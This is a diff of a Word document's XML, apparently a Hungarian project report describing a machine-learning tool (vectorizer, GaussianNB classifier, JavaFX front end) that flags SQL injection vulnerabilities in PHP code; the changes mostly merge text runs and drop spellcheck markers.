-        <w:t xml:space="preserve">Másrészt a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">dataset </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">utolsó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>oszlopának bináris számai</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">t is kigyűjti, ezeket az </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1.oszlopának bináris számain is, amiket pedig az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">y </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>változóba tesz.</w:t>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19454,19 +17512,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>saveVectorAs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">saveVectorAs: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19502,7 +17552,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> változókat lementi egy-egy </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19513,14 +17562,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>py</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlba.</w:t>
+        <w:t>py fájlba.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19573,16 +17615,8 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>-on</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19667,23 +17701,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">kód SQL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>injectionbeli</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sebezhetőségével kapcsolatban.</w:t>
+        <w:t>kód SQL injectionbeli sebezhetőségével kapcsolatban.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19746,35 +17764,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egyrészt beolvassa a „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>toimport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>numpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlokat, amiket a classifier2 metódusnak ad át, másrészt </w:t>
+        <w:t xml:space="preserve">egyrészt beolvassa a „toimport” numpy fájlokat, amiket a classifier2 metódusnak ad át, másrészt </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19788,7 +17778,6 @@
         </w:rPr>
         <w:t xml:space="preserve">„test” </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19805,14 +17794,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>y</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlokat</w:t>
+        <w:t>y fájlokat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19844,88 +17826,48 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trainX</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>trainX, train</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és tesztelésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Y</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és tesztelésére</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>testX</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>testY</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>testX, testY</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19972,40 +17914,26 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>a test_bmodel metódus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Az általa visszaadott metrikák segítségével </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>test_bmodel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> metódus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Az általa visszaadott metrikák segítségével </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -20070,83 +17998,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Látható, hogy a Gaussian </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>GaussianNB</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 73% és 77% közötti </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Recall</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classifier</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> met</w:t>
+        <w:t xml:space="preserve"> Látható, hogy a Gaussian Naive Bayes éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a GaussianNB 73% és 77% közötti Recall értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a classifier met</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20175,19 +18033,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>test_bmodel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">test_bmodel: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20272,49 +18122,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Confusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Matrix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Recall</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
+        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20355,19 +18163,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classifier</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20705,12 +18505,186 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z asztali alkalmazás</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>front-end</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oldaláról az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">first.fxml </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">felhasználói bemenete </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>biztosít ismeretlen adatokat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amelyeket a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>back-end</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>first</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Controller</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>toimport_vulnerabilities.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> néven ment el a többi PHP kód közé</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, majd navigál át a PrimaryController-be.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Itt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a kód a vektorizálásig ugyan azokon a lépéseken megy végig, mint a többi, ám nem lesz összefűzve </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>velük</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Helyette </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">önálló vektorokat kap, amiket a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">vecotirzer.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>„toimport” numpy fájlokba ment le.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ezeket olvassa be a main metódus és ad át a classifier2-nek.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>front-end</w:t>
       </w:r>
       <w:r>
@@ -20719,14 +18693,54 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>first.fxml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>új kódo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bekérésén kívül az eredmények kiíratásáért is felelős</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>: a classifier2 által kií</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>rt első két sor valószínűség</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i számait </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>PrimaryController</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -20737,25 +18751,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">felhasználói bemenete </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>biztosít ismeretlen adatokat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, amelyeket a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>back-end</w:t>
+        <w:t>olvassa be és</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20767,167 +18763,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>first</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Controller</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">e </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>toimport_vulnerabilities.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> néven ment el a többi PHP kód közé</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, majd navigál át a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>PrimaryController</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-be.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Itt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a kód a vektorizálásig ugyan azokon a lépéseken megy végig, mint a többi, ám nem lesz összefűzve </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>velük</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Helyette </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">önálló vektorokat kap, amiket a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">vecotirzer.py </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>„</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>toimport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>numpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlokba ment le.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Ezeket olvassa be a main metódus és ad át a classifier2-nek.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>front-end</w:t>
+        <w:t>a hozzá tartozó primary.fxml</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20939,101 +18775,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>új kódo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>k</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bekérésén kívül az eredmények kiíratásáért is felelős</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>: a classifier2 által kií</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">rt első két sor valószínűségeit </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
